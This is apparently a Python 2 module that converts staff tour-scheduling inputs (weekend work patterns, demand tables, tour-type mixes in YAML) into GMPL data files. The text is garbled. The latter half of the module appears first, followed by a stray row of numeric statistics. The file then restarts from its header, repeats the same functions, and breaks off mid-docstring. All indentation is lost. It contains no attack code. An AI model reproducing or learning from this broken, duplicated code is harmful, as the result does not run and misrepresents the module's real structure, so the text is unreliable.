if not tourtype[0]['half_weekends_ok'] and num_half_weekends(pattern,wkendtype) > 0:
keep = False
return keep
def num_full_weekends(x,wkendtype):
"""
Returns number of full weekends (both days) worked in a given weekends worked pattern.
Inputs:
x - list of 2-tuples representing weekend days worked. Each list
element is one week. The tuple of binary values represent the
first and second day of the weekend for that week. A 1 means
the day is worked, a 0 means it is off.
wkend_type - 1 --> weekend consists of Saturday and Sunday
2 --> weekend consists of Friday and Saturday
Output:
Number of full weekends worked
Example:
n = num_full_weekends([(0,1),(1,0),(0,1),(1,0)],1)
# n = 2
n = num_full_weekends([(0,1),(1,0),(0,1),(0,0)],1)
# n = 1
n = num_full_weekends([(1,1),(1,0),(1,1),(1,0)],2)
# n = 2
n = num_full_weekends([(0,1),(1,0),(0,1),(0,0)],2)
# n = 0
"""
if wkendtype == 2:
L1 = [sum(j) for j in x]
n = sum([(1 if j == 2 else 0) for j in L1])
else:
n = 0
for j in range(len(x)):
if j < len(x) - 1:
if x[j][1] == 1 and x[j+1][0] == 1:
n += 1
else:
if x[j][1] == 1 and x[0][0] == 1:
n += 1
return n
def num_half_weekends(x,wkendtype):
"""
Returns number of half weekends (one day) worked in a given weekends worked pattern.
Inputs:
x - list of 2-tuples representing weekend days worked. Each list
element is one week. The tuple of binary values represent the
first and second day of the weekend for that week. A 1 means
the day is worked, a 0 means it is off.
wkend_type - 1 --> weekend consists of Saturday and Sunday
2 --> weekend consists of Friday and Saturday
Output:
Number of half weekends worked
Example:
n = num_half_weekends([(0,1),(1,0),(0,1),(1,0)],1)
# n = 0
n = num_half_weekends([(0,1),(1,0),(0,1),(0,0)],1)
# n = 1
n = num_half_weekends([(1,1),(1,0),(1,1),(1,0)],2)
# n = 2
n = num_half_weekends([(0,1),(1,0),(0,1),(0,0)],2)
# n = 3
"""
if wkendtype == 2:
L1 = [sum(j) for j in x]
n = sum([(1 if j == 1 else 0) for j in L1])
else:
n = 0
for j in range(len(x)):
if j < len(x) - 1:
if x[j][1] + x[j+1][0] == 1:
n += 1
else:
if x[j][1] + x[0][0] == 1:
n += 1
return n
##param dmd_staff := [*,*,1] :
## 1 2 3 4 5 6 7 :=
## 1 5.0 4.0 4.0 4.0 5.0 5.0 5.0
## 2 5.0 4.0 4.0 4.0 5.0 5.0 5.0
## 3 5.0 4.0 4.0 4.0 5.0 5.0 5.0
## 4 5.0 4.0 4.0 4.0 5.0 5.0 5.0
def scalar_to_param(pname,pvalue,isStringIO=True):
"""
Convert a scalar to a GMPL representation of a parameter.
Inputs:
param_name - string name of paramter in GMPL file
pvalue - value of parameter
isstringio - true to return StringIO object, false to return string
Output:
GMPL dat code for scalar parameter either as a StringIO
object or a string.
Example:
param n_prds_per_day := 48;
"""
param = 'param ' + pname + ' := ' + str(pvalue) + ';\n'
if isStringIO:
paramout = StringIO.StringIO()
paramout.write(param)
return paramout.getvalue()
else:
return param
def list_to_param(pname,plist,reverseidx=False,isStringIO=True):
"""
Convert a list to a GMPL representation of a parameter.
Inputs:
param_name - string name of paramter in GMPL file
plist - list containing parameter (could be N-Dimen list)
reverseidx - True to reverse the order of the indexes (essentially transposing the matrix)
isstringio - True to return StringIO object, False to return string
Output:
GMPL dat code for list parameter either as a StringIO
object or a string.
Example:
param midnight_thresh:=
1 100
2 100
3 100
;
"""
# Convert parameter as list to an ndarray
parray = array(plist)
# Denumerate the array to get at the index tuple and array value
paramrows = ndenumerate(parray)
param = 'param ' + pname + ':=\n'
for pos, val in paramrows:
poslist = [str(p + 1) for p in pos]
if reverseidx:
poslist.reverse()
datarow = ' '.join(poslist) + ' ' + str(val) + '\n'
param += datarow
param += ";\n"
if isStringIO:
paramout = StringIO.StringIO()
paramout.write(param)
return paramout.getvalue()
else:
return param
def shiftlencons_to_param(pname,ttspec,plist,isStringIO=True):
"""
Convert the shift length specific inputs for the days worked and periods
worked constraints to a GMPL representation of a parameter.
Cannot use the generic list_to_param function above since the potentially
jagged nature of the lists storing these parameters makes it impossible to
convert to a numpy array for denumeration.
Inputs:
param_name - string name of paramter in GMPL file
plist - list containing parameter (could be N-Dimen list)
isstringio - true to return StringIO object, false to return string
Output:
param tt_shiftlen_min_dys_weeks:=
1 6 1 3
1 6 2 5
1 6 3 5
1 6 4 5
...
"""
lengths = get_lengths_from_mix(ttspec)
param = 'param ' + pname + ':=\n'
for t in range(0,len(plist)): # Outer loop is tour types in mix
t_x = ttspec['tourtypes'][t]['ttnum'] # Get tour type number
for s in range(0,len(plist[t])): # Inner loop is shift length
# Get shift length index
s_x = lengths.index(ttspec['tourtypes'][t]['shiftlengths'][s]['numbins'])
# Generate the GMPL rows for this tour type, shift length
for w in range(0,len(plist[t][s])):
rowlist = [str(t_x),str(s_x + 1),str(w+1),str(plist[t][s][w])]
datarow = ' '.join(rowlist) + ' ' + '\n'
param += datarow
param += ";\n"
if isStringIO:
paramout = StringIO.StringIO()
paramout.write(param)
return paramout.getvalue()
else:
return param
def list_to_indexedset(sname,slist,isStringIO=True):
"""
Convert a list to a GMPL representation of a parameter.
Inputs:
gmpl_set_name - string name of set in GMPL file
set_list - list containing set (could be N-Dimen list)
isstringio - true to return StringIO object, false to return string
Output:
set tt_length_x[1] :=
5 6;
"""
# Convert set as list to GMPL string rep'n
gset = ''
sindex = 0
for s in slist:
gset += 'set ' + sname + '[' + str(sindex + 1) + '] :=\n'
datarow = ' '.join(map(str, s)) + ';\n'
gset += datarow
sindex += 1
if isStringIO:
gsetout = StringIO.StringIO()
gsetout.write(gset)
return gsetout.getvalue()
else:
return gset
def mix_days_prds_params(ttspec,pname,nonshiftlen_pname,shiftlen_pname,isStringIO=True):
"""
Convert the various tour type mix lower and upper bounds (both cumulative
and non-cumulative and both shift length specific and non-shift length
specific) to their GMPL parameter representation.
It's a wrapper function in that it calls list_to_param() for non-shift
length specific inputs and shiftlencons_to_param() for shift length
specific inputs.
Inputs:
ttspec - the tour type spec object created from the mix file
param_name - string name of paramter in GMPL file
non_shiftlen_param_name - string name of non-shift length specific mix parameter key in YAML file
shiftlen_param_name - string name of shift length specific mix parameter key in YAML file
Output:
param tt_shiftlen_min_dys_weeks:=
1 6 1 3
1 6 2 5
1 6 3 5
1 6 4 5
...
"""
L = []
isShiftLen = False
for m in ttspec['tourtypes']:
if 'shiftlen' in pname:
isShiftLen = True
shiftL = []
for s in m['shiftlengths']:
shiftL.append(s[shiftlen_pname])
L.append(shiftL)
else:
if nonshiftlen_pname in m:
L.append(m[nonshiftlen_pname])
else:
L.append(m['shiftlengths'][0][shiftlen_pname])
if not isShiftLen:
return list_to_param(pname,L)
else:
return shiftlencons_to_param(pname,ttspec,L)
def mix_to_dat(probspec,isStringIO=True):
"""
Reads a YAML mix file and generates all of the GMPL dat components associated with
the mix inputs.
Inputs:
ttspec - the tour type spec object created from the mix file
param_name - string name of paramter in GMPL file
non_shiftlen_param_name - string name of non-shift length specific mix parameter key in YAML file
shiftlen_param_name - string name of shift length specific mix parameter key in YAML file
Output:
param tt_shiftlen_min_dys_weeks:=
1 6 1 3
1 6 2 5
1 6 3 5
1 6 4 5
...
"""
# Open the mix file and load it into a YAML object
fn_mix = probspec['reqd_files']['filename_mix']
fin = open(fn_mix,"r")
ttspec = yaml.load(fin)
mixout = StringIO.StringIO()
## print ttspec
## print ttspec['tourtypes']
## print ttspec['tourtypes'][0]
## print ttspec['tourtypes'][0]['min_days_week']
# Get set of shift lengths and order them ascending by length
lenset = set([])
for m in ttspec['tourtypes']:
for s in m['shiftlengths']:
lenset.add(s['numbins'])
lengths = list(lenset)
lengths.sort()
len_param = list_to_param('lengths', lengths)
# Number of shift lengths
n_lengths = size(lengths)
numlen_param = scalar_to_param('n_lengths', n_lengths)
# Number of tour types
n_ttypes = size(ttspec['tourtypes'])
numttypes_param = scalar_to_param('n_tts', n_ttypes)
# Tour type length sets
lenxset = get_length_x_from_mix(ttspec)
lenxset_set = list_to_indexedset('tt_length_x', lenxset)
# Midnight threshold for weekend assignments
midthresholds = [m['midnight_thresh'] for m in ttspec['tourtypes']]
midthresh_param = list_to_param('midnight_thresh', midthresholds)
# Parttime flag and bound
ptflags = [m['is_parttime'] for m in ttspec['tourtypes']]
ptflags_param = list_to_param('tt_parttime', ptflags)
ptfrac = ttspec['max_parttime_frac']
ptfrac_param = scalar_to_param('max_parttime_frac', ptfrac)
# Global start window width
width = ttspec['g_start_window_width']
width_param = scalar_to_param('g_start_window_width', width)
# Lower and upper bounds on number scheduled
if 'opt_files' in probspec and 'filename_ttbounds' in probspec['opt_files']:
fn_ttbnds = probspec['opt_files']['filename_ttbounds']
fin_ttbnds = open(fn_ttbnds,"r")
ttbndsspec = yaml.load(fin_ttbnds)
tt_lb = [m['tt_lb'] for m in ttbndsspec['tourtypes']]
tt_lb_param = list_to_param('tt_lb', tt_lb)
tt_ub = [m['tt_ub'] for m in ttbndsspec['tourtypes']]
tt_ub_param = list_to_param('tt_ub', tt_ub)
else:
tt_lb = [m['tt_lb'] for m in ttspec['tourtypes']]
tt_lb_param = list_to_param('tt_lb', tt_lb)
tt_ub = [m['tt_ub'] for m in ttspec['tourtypes']]
tt_ub_param = list_to_param('tt_ub', tt_ub)
# Cost multiplier
tt_cost_multiplier = [m['tt_cost_multiplier'] for m in ttspec['tourtypes']]
tt_cost_multiplier_param = list_to_param('tt_cost_multiplier',
tt_cost_multiplier)
# Min and max cumulative days and prds worked over the weeks
tt_min_dys_weeks_param = mix_days_prds_params(ttspec,
'tt_min_dys_weeks','min_days_week',
'min_shiftlen_days_week')
tt_max_dys_weeks_param = mix_days_prds_params(ttspec,
'tt_max_dys_weeks','max_days_week',
'max_shiftlen_days_week')
tt_min_prds_weeks_param = mix_days_prds_params(ttspec,
'tt_min_prds_weeks','min_prds_week',
'min_shiftlen_prds_week')
tt_max_prds_weeks_param = mix_days_prds_params(ttspec,
'tt_max_prds_weeks','max_prds_week',
'max_shiftlen_prds_week')
# Min and max days and prds worked over the weeks
# for each shift length workable in the tour type
tt_shiftlen_min_dys_weeks_param = mix_days_prds_params(ttspec,
'tt_shiftlen_min_dys_weeks','min_days_week',
'min_shiftlen_days_week')
tt_shiftlen_max_dys_weeks_param = mix_days_prds_params(ttspec,
'tt_shiftlen_max_dys_weeks','max_days_week',
'max_shiftlen_days_week')
tt_shiftlen_min_prds_weeks_param = mix_days_prds_params(ttspec,
'tt_shiftlen_min_prds_weeks','min_prds_week',
'min_shiftlen_prds_week')
tt_shiftlen_max_prds_weeks_param = mix_days_prds_params(ttspec,
'tt_shiftlen_max_prds_weeks','max_prds_week',
'max_shiftlen_prds_week')
# Min and max days and prds worked each week
tt_min_cumul_dys_weeks_param = mix_days_prds_params(ttspec,
'tt_min_cumul_dys_weeks','min_cumul_days_week',
'min_shiftlen_cumul_days_week')
tt_max_cumul_dys_weeks_param = mix_days_prds_params(ttspec,
'tt_max_cumul_dys_weeks','max_cumul_days_week',
'max_shiftlen_cumul_days_week')
tt_min_cumul_prds_weeks_param = mix_days_prds_params(ttspec,
'tt_min_cumul_prds_weeks','min_cumul_prds_week',
'min_shiftlen_cumul_prds_week')
tt_max_cumul_prds_weeks_param = mix_days_prds_params(ttspec,
'tt_max_cumul_prds_weeks','max_cumul_prds_week',
'max_shiftlen_cumul_prds_week')
# Min and max cumulative days and prds worked over the weeks
# for each shift length workable in the tour type
tt_shiftlen_min_cumul_dys_weeks_param = mix_days_prds_params(ttspec,
'tt_shiftlen_min_cumul_dys_weeks','min_cumul_days_week',
'min_shiftlen_cumul_days_week')
tt_shiftlen_max_cumul_dys_weeks_param = mix_days_prds_params(ttspec,
'tt_shiftlen_max_cumul_dys_weeks','max_cumul_days_week',
'max_shiftlen_cumul_days_week')
tt_shiftlen_min_cumul_prds_weeks_param = mix_days_prds_params(ttspec,
'tt_shiftlen_min_cumul_prds_weeks','min_cumul_prds_week',
'min_shiftlen_cumul_prds_week')
tt_shiftlen_max_cumul_prds_weeks_param = mix_days_prds_params(ttspec,
'tt_shiftlen_max_cumul_prds_weeks','max_cumul_prds_week',
'max_shiftlen_cumul_prds_week')
# Put the parameter pieces together into a single StringIO object
print >>mixout, numlen_param
print >>mixout, len_param
print >>mixout, numttypes_param
print >>mixout, lenxset_set
print >>mixout, midthresh_param
print >>mixout, tt_lb_param
print >>mixout, tt_ub_param
print >>mixout, tt_cost_multiplier_param
print >>mixout, ptflags_param
print >>mixout, ptfrac_param
print >>mixout, width_param
print >>mixout, tt_min_cumul_dys_weeks_param
print >>mixout, tt_max_cumul_dys_weeks_param
print >>mixout, tt_min_cumul_prds_weeks_param
print >>mixout, tt_max_cumul_prds_weeks_param
print >>mixout, tt_min_dys_weeks_param
print >>mixout, tt_max_dys_weeks_param
print >>mixout, tt_min_prds_weeks_param
print >>mixout, tt_max_prds_weeks_param
print >>mixout, tt_shiftlen_min_dys_weeks_param
print >>mixout, tt_shiftlen_max_dys_weeks_param
print >>mixout, tt_shiftlen_min_prds_weeks_param
print >>mixout, tt_shiftlen_max_prds_weeks_param
print >>mixout, tt_shiftlen_min_cumul_dys_weeks_param
print >>mixout, tt_shiftlen_max_cumul_dys_weeks_param
print >>mixout, tt_shiftlen_min_cumul_prds_weeks_param
print >>mixout, tt_shiftlen_max_cumul_prds_weeks_param
# print mixout.getvalue()
if isStringIO:
return mixout.getvalue()
else:
smixout = mixout.read()
return smixout
def get_length_x_from_mix(ttspec):
"""
Get list of lists of shift length indexes for each tour type from
a mix spec.
Inputs:
ttspec - yaml representation of tour type mix parameters
Output:
A list of lists whose elements are the shift length indexes for
each tour type.
Example: [[1,2],[2]]
"""
# Get set of shift lengths and order them ascending by length
lenset = set([])
for m in ttspec['tourtypes']:
for s in m['shiftlengths']:
lenset.add(s['numbins'])
lengths = list(lenset)
lengths.sort()
lenxset = []
for m in ttspec['tourtypes']:
shifts = [lengths.index(s['numbins']) for s in m['shiftlengths']]
shifts = [s + 1 for s in shifts]
shifts.sort()
lenxset.append(shifts)
return lenxset
def get_lengths_from_mix(ttspec):
"""
Get set of shift lengths and order them ascending by length
Inputs:
ttspec - yaml representation of tour type mix parameters
Output:
A sorted list of shift lengths.
Example: [8, 16, 20, 24]
"""
#
lenset = set([])
for m in ttspec['tourtypes']:
for s in m['shiftlengths']:
lenset.add(s['numbins'])
lengths = list(lenset)
lengths.sort()
return lengths
def csvrow_to_yaml(fn_csv, isStringIO=True):
"""
Convert a comma delimited row of data into a
a yaml representation that can be inserted into the yaml mix file.
This procedure does not not know or care what each row means in the sense
It's just taking a comma or semicolon delimited row and converts it to yaml.
Inputs:
fn_csv - csv filename containing rows of size n_periods_per_day
isstringio - true to return StringIO object, false to return string
Output:
yaml version of csv row of data either as a StringIO
object or a string.
Example:
Input: 0, 1, 0, 0
Output: [0, 1, 0, 0]
"""
fin = open(fn_csv,'r')
dialect = csv.Sniffer().sniff(fin.read(1024),delimiters=',;')
fin.seek(0)
ash_data = csv.reader(fin,dialect)
ash_list = [map(float,row) for row in ash_data]
fin.close
yamlstr = ''
for row in ash_list:
yamlstr += (' - ' + str(row) + '\n')
if isStringIO:
yamlout = StringIO.StringIO()
yamlout.write(yamlstr)
return yamlout.getvalue()
else:
return yamlstr
def ash_to_dat(fn_yni,fn_mix,isStringIO=True):
"""
Convert allowable shift start time inputs into GMPL dat form.
Inputs:
fn_yni - filename of yaml ini scenario file
fn_mix - filename of yaml tour type mix file
isstringio - true to return StringIO object, false to return string
Output:
GMPL dat code for allowable shift start times either as a StringIO
object or a string.
Example:
param allow_start:=
1 1 1 2 0.0
2 1 1 2 0.0
3 1 1 2 0.0
4 1 1 2 0.0
...
13 1 1 2 1.0
14 1 1 2 1.0
15 1 1 2 1.0
"""
fin_yni = open(fn_yni,"r")
probspec = yaml.load(fin_yni)
fin_mix = open(fn_mix,"r")
ttspec = yaml.load(fin_mix)
# param allow_start[i,j,t,s] = 1 if period i and day j is an allowable
# shift start time for shift length s of tour type t
lenxset = get_lengths_from_mix(ttspec)
ash_rows = []
for m in ttspec['tourtypes']:
for s in m['shiftlengths']:
for j in range(len(s['allowable_starttimes'])):
for i in range(len(s['allowable_starttimes'][j])):
length_x = lenxset.index(s['numbins'])
L = [i+1,j+1,length_x+1,m['ttnum'],s['allowable_starttimes'][j][i]]
ash_rows.append(L)
param = 'param allow_start:=\n'
for val in ash_rows:
datarow = ' '.join(map(str, val)) + '\n'
param += datarow
param += ";\n"
if isStringIO:
paramout = StringIO.StringIO()
paramout.write(param)
return paramout.getvalue()
else:
return param
## p = [(0,1),(1,1),(0,0),(1,0)]
## n = num_full_weekends(p,1)
def mwts_createdat(fn_yni,fn_dat):
"""
Create a GMPL dat file for mwts problems.
Inputs:
fn_yni - Name of YAML input file for the mwts problem
Output:
fn_dat - Name of GMPL dat file to create
"""
fin = open(fn_yni,"r")
probspec = yaml.load(fin)
# General section
num_prds_per_day_param = scalar_to_param('n_prds_per_day',
probspec['time']['n_prds_per_day'])
num_days_per_week_param = scalar_to_param('n_days_per_week',
probspec['time']['n_days_per_week'])
num_weeks_param = scalar_to_param('n_weeks',
probspec['time']['n_weeks'])
# Cost related
labor_budget_param = scalar_to_param('labor_budget',probspec['cost']
['labor_budget'])
cu1_param = scalar_to_param('cu1',probspec['cost']
['understaff_cost_1'])
cu2_param = scalar_to_param('cu2',probspec['cost']
['understaff_cost_2'])
usb_param = scalar_to_param('usb',probspec['cost']
['understaff_1_lb'])
# Demand section
dmd_dat = dmd_min_to_dat('dmd_staff',probspec['reqd_files']['filename_dmd'],mode='unsliced')
# Min staff section
min_dat = dmd_min_to_dat('min_staff',probspec['reqd_files']['filename_min'],mode='unsliced')
# Mix section
mix_dat = mix_to_dat(probspec)
# Weekends worked patterns section
wkends_dat = wkends_to_dat(fn_yni,probspec['reqd_files']['filename_mix'])
# Allowable shift start time section
ash_dat = ash_to_dat(fn_yni,probspec['reqd_files']['filename_mix'])
# Put the pieces together
dat = StringIO.StringIO()
print >>dat, num_prds_per_day_param
print >>dat, num_days_per_week_param
print >>dat, num_weeks_param
print >>dat, labor_budget_param
print >>dat, cu1_param
print >>dat, cu2_param
print >>dat, usb_param
print >>dat, mix_dat
print >>dat, dmd_dat
print >>dat, min_dat
print >>dat, wkends_dat
print >>dat, ash_dat
fout = open(fn_dat,"w")
print >>fout, dat.getvalue()
fout.close()
if __name__ == '__main__':
main()
| 32.451098 | 164 | 0.605548 | #-------------------------------------------------------------------------------
# Name: mwts_makedat
# Purpose: mwts dat file creation
#
# Author: isken
#
# Created: 28/09/2011
# Copyright: (c) isken 2011
# Licence: <your licence>
#-------------------------------------------------------------------------------
#!/usr/bin/env python
import sys
import StringIO
import yaml
from numpy import *
import csv
import json
import itertools
"""
mwts_makedat is a module for reading input files for mwts problems
and creating an AMPL/GMPL data file.
It is a replacement for the ancient createssdat.c program that was
used to create AMPL/GMPL dat files for one week tour scheduling problems.
"""
def create_weekend_base(n_weeks):
"""
Generate basis for cartesion product of [0,1] lists based
on number of weeks in scheduling problem. Each list
element is one week. The tuple of binary values represent the
first and second day of the weekend for that week. A 1 means
the day is worked, a 0 means it is off.
Input:
n_weeks - number of weeks in scheduling horizon
Output:
Result is all the possible n_weeks weekends worked patterns.
Example: n_weeks = 4 --> 256 possible weekends worked patterns. This
exhaustive list can later be filtered to only include desirable patterns.
"""
basis_list = [[0,0],[1,0],[0,1],[1,1]]
mw_basis_list = []
for i in range(n_weeks):
mw_basis_list.append(basis_list)
# Use itertools to create the n_weeks cartesion product of the basis_list.
return list(itertools.product(*mw_basis_list))
def filterpatterns(pattern,ttnum,wkendtype,ttspec):
"""
Creates a sequence of binary values to be used for list filtering. This
function will contain the various rules used to filter out weekend days
worked patterns that we don't want to allow.
For now I'm hard coding in rules but need to develop an approach to
flexibly specifiying rules to apply to filter out undesirable weekends
worked patterns.
Inputs:
x - list of 2-tuples representing weekend days worked. Each list
element is one week. The tuple of binary values represent the
first and second day of the weekend for that week. A 1 means
the day is worked, a 0 means it is off.
type - 1 --> weekend consists of Saturday and Sunday
2 --> weekend consists of Friday and Saturday
max_days_worked - max # of weekend days worked over horizon
max_wkends_worked - max # of weekends in which >= 1 day worked
half_weekends_ok - True or False
max_consec_wkends - max consecutive weeks with >= 1 day worked
Examples:
(1) Type 1, work every other weekend
pattern = [(0,1),(1,0),(0,1),(1,0)], type = 1
(2) Type 1, work every other weekend
pattern = [(1,1),(0,0),(1,1),(0,0)], type = 2
Output: True --> keep pattern
False --> discard pattern
"""
n_weeks = len(pattern)
keep = True
tourtype = [t for t in ttspec['tourtypes'] if t['ttnum'] == ttnum]
# No more than max_days_worked over the scheduling horizon
max_days_worked = tourtype[0]['max_days_worked']
if not (sum(pattern) <= max_days_worked):
keep = False
# No consecutive weekends with one or more days worked
window = ntuples(pattern,2)
for pair in window:
if sum(pair) > 2:
keep = False
# No half-weekends
if not tourtype[0]['half_weekends_ok'] and num_half_weekends(pattern,wkendtype) > 0:
keep = False
return keep
def num_full_weekends(x,wkendtype):
"""
Returns number of full weekends (both days) worked in a given weekends worked pattern.
Inputs:
x - list of 2-tuples representing weekend days worked. Each list
element is one week. The tuple of binary values represent the
first and second day of the weekend for that week. A 1 means
the day is worked, a 0 means it is off.
wkend_type - 1 --> weekend consists of Saturday and Sunday
2 --> weekend consists of Friday and Saturday
Output:
Number of full weekends worked
Example:
n = num_full_weekends([(0,1),(1,0),(0,1),(1,0)],1)
# n = 2
n = num_full_weekends([(0,1),(1,0),(0,1),(0,0)],1)
# n = 1
n = num_full_weekends([(1,1),(1,0),(1,1),(1,0)],2)
# n = 2
n = num_full_weekends([(0,1),(1,0),(0,1),(0,0)],2)
# n = 0
"""
if wkendtype == 2:
L1 = [sum(j) for j in x]
n = sum([(1 if j == 2 else 0) for j in L1])
else:
n = 0
for j in range(len(x)):
if j < len(x) - 1:
if x[j][1] == 1 and x[j+1][0] == 1:
n += 1
else:
if x[j][1] == 1 and x[0][0] == 1:
n += 1
return n
def num_half_weekends(x,wkendtype):
"""
Returns number of half weekends (one day) worked in a given weekends worked pattern.
Inputs:
x - list of 2-tuples representing weekend days worked. Each list
element is one week. The tuple of binary values represent the
first and second day of the weekend for that week. A 1 means
the day is worked, a 0 means it is off.
wkend_type - 1 --> weekend consists of Saturday and Sunday
2 --> weekend consists of Friday and Saturday
Output:
Number of half weekends worked
Example:
n = num_half_weekends([(0,1),(1,0),(0,1),(1,0)],1)
# n = 0
n = num_half_weekends([(0,1),(1,0),(0,1),(0,0)],1)
# n = 1
n = num_half_weekends([(1,1),(1,0),(1,1),(1,0)],2)
# n = 2
n = num_half_weekends([(0,1),(1,0),(0,1),(0,0)],2)
# n = 3
"""
if wkendtype == 2:
L1 = [sum(j) for j in x]
n = sum([(1 if j == 1 else 0) for j in L1])
else:
n = 0
for j in range(len(x)):
if j < len(x) - 1:
if x[j][1] + x[j+1][0] == 1:
n += 1
else:
if x[j][1] + x[0][0] == 1:
n += 1
return n
def ntuples(lst, n):
return zip(*[lst[i:]+lst[:i] for i in range(n)])
def dmd_min_to_dat(gmpl_param_name,fn_dmd_or_min,mode='unsliced',isStringIO=True):
# The input file containing demand by period is assumed to contain
# each day on a separate row. The number of columns is the same as the
# number of periods per day. If the file was for a two week problem with
# half-hour epoch_tuples, there would be 14 rows and 48 columns. Demand here is
# really the target staffing level and can be a real number.
fin = open(fn_dmd_or_min,"r")
# Read all the lines, strip the trailing spaces, split on the columns
# and cast the resultant strings to floats. We end up with a 2D array
# implemented as a list of lists of floats. Done with the input file.
days = fin.readlines()
days = [day.rstrip() for day in days]
days = [day.split() for day in days]
for day in days:
day[:] = [float(dmd) for dmd in day]
fin.close
# We always assume a 7 day week.
num_weeks = len(days)/7
# Not checking for missing or extra columns. Assuming input file
# creator got it right.
num_prds = len(days[0])
# Now it's time to write the GMPL code for this input data element.
if mode == 'sliced':
param = 'param ' + gmpl_param_name + ' := '
for week in range(1,num_weeks + 1):
# Write the GMPL indexed parameter slice specifier for the week
weekheader = '\n[*,*,{0}] :'.format(week) + '\n'
weekheader += ' '.join(map(str, range(1,8)))
weekheader += ' :=\n'
param += weekheader
# Need to transpose the demand values so that days become cols
# and epoch_tuples become rows and then write out the GMPL matrix.
for prd in range(num_prds):
prd_line = []
prd_line.append(prd+1)
prd_line.extend([days[(week-1)*7+day][prd] for day in range(7)])
prd_line_out = '{0:3d}{1:7.2f}{2:7.2f}{3:7.2f}{4:7.2f}{5:7.2f}{6:7.2f}{7:7.2f}'.format(*prd_line)
prd_line_out += '\n'
param += prd_line_out
else: # Unsliced format
weeks_of_dmd = []
for week in range(1,num_weeks + 1):
week_of_days = []
for day in range(1,8):
week_of_days.append(days[7*(week-1) + day - 1])
weeks_of_dmd.append(week_of_days)
# Need to reverse the index list so that it is period, day and
# matches the parameter spec.
param = list_to_param(gmpl_param_name, weeks_of_dmd, reverseidx=True)
# End the GMPL parameter spec and close the file
if isStringIO:
paramout = StringIO.StringIO()
paramout.write(param)
return paramout.getvalue()
else:
return param
##param dmd_staff := [*,*,1] :
## 1 2 3 4 5 6 7 :=
## 1 5.0 4.0 4.0 4.0 5.0 5.0 5.0
## 2 5.0 4.0 4.0 4.0 5.0 5.0 5.0
## 3 5.0 4.0 4.0 4.0 5.0 5.0 5.0
## 4 5.0 4.0 4.0 4.0 5.0 5.0 5.0
def scalar_to_param(pname,pvalue,isStringIO=True):
"""
Convert a scalar to a GMPL representation of a parameter.
Inputs:
param_name - string name of paramter in GMPL file
pvalue - value of parameter
isstringio - true to return StringIO object, false to return string
Output:
GMPL dat code for scalar parameter either as a StringIO
object or a string.
Example:
param n_prds_per_day := 48;
"""
param = 'param ' + pname + ' := ' + str(pvalue) + ';\n'
if isStringIO:
paramout = StringIO.StringIO()
paramout.write(param)
return paramout.getvalue()
else:
return param
def list_to_param(pname,plist,reverseidx=False,isStringIO=True):
"""
Convert a list to a GMPL representation of a parameter.
Inputs:
param_name - string name of paramter in GMPL file
plist - list containing parameter (could be N-Dimen list)
reverseidx - True to reverse the order of the indexes (essentially transposing the matrix)
isstringio - True to return StringIO object, False to return string
Output:
GMPL dat code for list parameter either as a StringIO
object or a string.
Example:
param midnight_thresh:=
1 100
2 100
3 100
;
"""
# Convert parameter as list to an ndarray
parray = array(plist)
# Denumerate the array to get at the index tuple and array value
paramrows = ndenumerate(parray)
param = 'param ' + pname + ':=\n'
for pos, val in paramrows:
poslist = [str(p + 1) for p in pos]
if reverseidx:
poslist.reverse()
datarow = ' '.join(poslist) + ' ' + str(val) + '\n'
param += datarow
param += ";\n"
if isStringIO:
paramout = StringIO.StringIO()
paramout.write(param)
return paramout.getvalue()
else:
return param
def shiftlencons_to_param(pname,ttspec,plist,isStringIO=True):
"""
Convert the shift length specific inputs for the days worked and periods
worked constraints to a GMPL representation of a parameter.
Cannot use the generic list_to_param function above since the potentially
jagged nature of the lists storing these parameters makes it impossible to
convert to a numpy array for denumeration.
Inputs:
param_name - string name of paramter in GMPL file
plist - list containing parameter (could be N-Dimen list)
isstringio - true to return StringIO object, false to return string
Output:
param tt_shiftlen_min_dys_weeks:=
1 6 1 3
1 6 2 5
1 6 3 5
1 6 4 5
...
"""
lengths = get_lengths_from_mix(ttspec)
param = 'param ' + pname + ':=\n'
for t in range(0,len(plist)): # Outer loop is tour types in mix
t_x = ttspec['tourtypes'][t]['ttnum'] # Get tour type number
for s in range(0,len(plist[t])): # Inner loop is shift length
# Get shift length index
s_x = lengths.index(ttspec['tourtypes'][t]['shiftlengths'][s]['numbins'])
# Generate the GMPL rows for this tour type, shift length
for w in range(0,len(plist[t][s])):
rowlist = [str(t_x),str(s_x + 1),str(w+1),str(plist[t][s][w])]
datarow = ' '.join(rowlist) + ' ' + '\n'
param += datarow
param += ";\n"
if isStringIO:
paramout = StringIO.StringIO()
paramout.write(param)
return paramout.getvalue()
else:
return param
def list_to_indexedset(sname,slist,isStringIO=True):
"""
Convert a list to a GMPL representation of a parameter.
Inputs:
gmpl_set_name - string name of set in GMPL file
set_list - list containing set (could be N-Dimen list)
isstringio - true to return StringIO object, false to return string
Output:
set tt_length_x[1] :=
5 6;
"""
# Convert set as list to GMPL string rep'n
gset = ''
sindex = 0
for s in slist:
gset += 'set ' + sname + '[' + str(sindex + 1) + '] :=\n'
datarow = ' '.join(map(str, s)) + ';\n'
gset += datarow
sindex += 1
if isStringIO:
gsetout = StringIO.StringIO()
gsetout.write(gset)
return gsetout.getvalue()
else:
return gset
def mix_days_prds_params(ttspec,pname,nonshiftlen_pname,shiftlen_pname,isStringIO=True):
"""
Convert the various tour type mix lower and upper bounds (both cumulative
and non-cumulative and both shift length specific and non-shift length
specific) to their GMPL parameter representation.
It's a wrapper function in that it calls list_to_param() for non-shift
length specific inputs and shiftlencons_to_param() for shift length
specific inputs.
Inputs:
ttspec - the tour type spec object created from the mix file
param_name - string name of paramter in GMPL file
non_shiftlen_param_name - string name of non-shift length specific mix parameter key in YAML file
shiftlen_param_name - string name of shift length specific mix parameter key in YAML file
Output:
param tt_shiftlen_min_dys_weeks:=
1 6 1 3
1 6 2 5
1 6 3 5
1 6 4 5
...
"""
L = []
isShiftLen = False
for m in ttspec['tourtypes']:
if 'shiftlen' in pname:
isShiftLen = True
shiftL = []
for s in m['shiftlengths']:
shiftL.append(s[shiftlen_pname])
L.append(shiftL)
else:
if nonshiftlen_pname in m:
L.append(m[nonshiftlen_pname])
else:
L.append(m['shiftlengths'][0][shiftlen_pname])
if not isShiftLen:
return list_to_param(pname,L)
else:
return shiftlencons_to_param(pname,ttspec,L)
def mix_to_dat(probspec,isStringIO=True):
"""
Reads a YAML mix file and generates all of the GMPL dat components associated with
the mix inputs.
Inputs:
ttspec - the tour type spec object created from the mix file
param_name - string name of paramter in GMPL file
non_shiftlen_param_name - string name of non-shift length specific mix parameter key in YAML file
